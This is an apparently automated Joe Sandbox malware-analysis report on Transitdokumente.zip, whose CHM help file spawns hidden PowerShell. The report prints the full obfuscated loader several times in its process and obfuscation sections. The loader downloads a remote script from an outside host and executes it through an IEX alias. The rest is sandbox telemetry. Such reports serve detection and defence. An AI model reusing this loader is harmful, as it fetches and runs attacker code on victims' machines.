Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Transitdokumente.zip

Overview

General Information

Sample Name:Transitdokumente.zip
Analysis ID:707677
MD5:23272bbcd8f183e8c03873fb0f9c6e56
SHA1:c52f6ba4fe98bf99927d3595071f95348ae9a485
SHA256:c220a262fc0c5c7835debdf7c17303020af2db45487663ffdd6d6e52e729e32a

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Obfuscated command line found
Document exploit detected (process start blacklist hit)
Suspicious powershell command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Allocates memory with a write watch (potentially for evading sandboxes)
Tries to load missing DLLs
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Spawns drivers
Creates a process in suspended mode (likely to inject code)
Contains long sleeps (>= 3 min)

Classification

  • System is w10x64_ra
  • udfs.sys (PID: 4 cmdline: MD5: 42E3C9843486385AA13DBDFF869888D5)
  • hh.exe (PID: 3904 cmdline: "C:\Windows\hh.exe" E:\Transitdokumente.chm MD5: DF73D52FDCE65F90A2E49EFB5248C77C)
    • powershell.exe (PID: 1984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P MD5: CDA48FC75952AD12D99E526D0B6BF70A)
      • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
  • cleanup
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 62.182.20.50:443 -> 192.168.2.3:49691 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\catroot2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\cd6cb6534439f5278a4f88ea9cb3c9cc\Microsoft.VisualBasic.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\en-US\KERNELBASE.dll.mui
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\

Software Vulnerabilities

barindex
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownDNS traffic detected: queries for: stradlingcollection.org
Source: unknownHTTPS traffic detected: 62.182.20.50:443 -> 192.168.2.3:49691 version: TLS 1.2
Source: C:\Windows\hh.exeSection loaded: dcomp.dll
Source: unknownDriver loaded: C:\Windows\System32\drivers\udfs.sys
Source: C:\Windows\hh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ec23d1294499b4ffba61f212cb1217cd\mscorlib.ni.dll
Source: unknownProcess created: C:\Windows\hh.exe "C:\Windows\hh.exe" E:\Transitdokumente.chm
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P
Source: C:\Windows\hh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52A2AAAE-085D-4187-97EA-8C30DB990436}\InprocServer32
Source: C:\Windows\hh.exeFile created: C:\Users\alfredo\AppData\Roaming\Microsoft\HTML Help
Source: C:\Windows\hh.exeFile created: C:\Users\alfredo\AppData\Local\Temp\IMT5F5.tmp
Source: classification engineClassification label: mal52.expl.winZIP@4/6@1/9
Source: C:\Windows\hh.exeFile read: C:\Users\alfredo\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\hh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations

Data Obfuscation

barindex
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9754
Source: C:\Windows\hh.exeMemory allocated: 2F073B10000 memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F073E10000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F073E50000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F073EE0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F073F60000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F073FA0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F073FC0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F073FE0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074000000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074020000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074080000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F0740A0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F0740C0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F0740E0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074100000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074120000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074160000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074180000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F0741A0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F0741C0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F0741E0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074200000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074240000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074260000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074280000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F0742A0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F0742C0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F0742E0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074320000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074340000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074360000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074380000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F0743A0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F0743E0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074400000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074420000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074440000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074460000 memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074480000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F0744A0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F0744E0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074500000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074520000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074540000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074560000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F074580000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 2F0745C0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4000Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\catroot2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\cd6cb6534439f5278a4f88ea9cb3c9cc\Microsoft.VisualBasic.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\en-US\KERNELBASE.dll.mui
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden $t0='de5'.replace('d','i').replace('5','x');sal p $t0;$erroractionpreference = 'silentlycontinue';$t56fg = [enum]::toobject([system.net.securityprotocoltype], 3072);[system.net.servicepointmanager]::securityprotocol = $t56fg;'[void' + '] [syst' + 'em.refle' + 'ction.asse' + 'mbly]::loadwi' + 'thpartialname(''microsoft.visualbasic'')'|p;do {$ping = test-connection -comp google.com -count 1 -quiet} until ($ping);$tty='(new-'+'obje'+'ct ne'+'t.we'+'bcli'+'ent)'|p;$mv= [microsoft.visualbasic.interaction]::callbyname($tty,'down' + 'load' + 'str' + 'ing',[microsoft.visualbasic.calltype]::method,'https' + '://stradlingcollection.org/tymoon.txt')|p
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden $t0='de5'.replace('d','i').replace('5','x');sal p $t0;$erroractionpreference = 'silentlycontinue';$t56fg = [enum]::toobject([system.net.securityprotocoltype], 3072);[system.net.servicepointmanager]::securityprotocol = $t56fg;'[void' + '] [syst' + 'em.refle' + 'ction.asse' + 'mbly]::loadwi' + 'thpartialname(''microsoft.visualbasic'')'|p;do {$ping = test-connection -comp google.com -count 1 -quiet} until ($ping);$tty='(new-'+'obje'+'ct ne'+'t.we'+'bcli'+'ent)'|p;$mv= [microsoft.visualbasic.interaction]::callbyname($tty,'down' + 'load' + 'str' + 'ing',[microsoft.visualbasic.calltype]::method,'https' + '://stradlingcollection.org/tymoon.txt')|p
